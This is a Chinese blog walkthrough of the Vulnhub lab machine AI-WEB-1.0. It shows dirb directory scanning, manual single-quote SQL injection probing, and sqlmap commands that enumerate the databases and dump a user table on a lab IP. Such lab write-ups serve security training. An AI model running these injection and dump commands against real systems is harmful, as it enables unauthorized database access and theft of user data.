Vulnhub靶机:AI-WEB-1.0

一.先访问网页

二 . 对网站进行文件和目录扫描

出现robots.txt

三.进入网站查询

访问发现/m3diNg0/没有权限

访问发现/se3reTdir777/目录可以访问成功

四.使用dirb进行扫描

dirb http://172.16.1.88/m3diNf0/
dirb http://172.16.1.88/se3reTdir777/

扫描发现到172.16.1.88/m3diNf0/有一个info.php页面

尝试访问

五.发现是页面查询,考虑sql注入

输入一个1试试

返回成功

返回成功

返回成功

当我们输入id为4时,返回失败了,查询结果为无
我们可以从数据库中知道一共有三个用户

尝试使用单引号结果报错(1')

产生报错,报错原因是单引号末闭合
再加一个单引号,两个单引号刚好构成闭合,如果返回正常的话则存在sql注入漏洞

可以看到正常返回了id为1的结果,存在注入
使用sqlmap进行注入攻击:
由于是post数据包,我们需要打开BP进行抓包,将数据包进行复制,存储到txt中进行sqlmap测试

六.使用sqlmap扫描

查看当前服务下所有数据库

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs

查看当前数据库下所有表

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables

判断User表下字段名称

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns

将id表中数据dump下来

sqlmap -u  "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值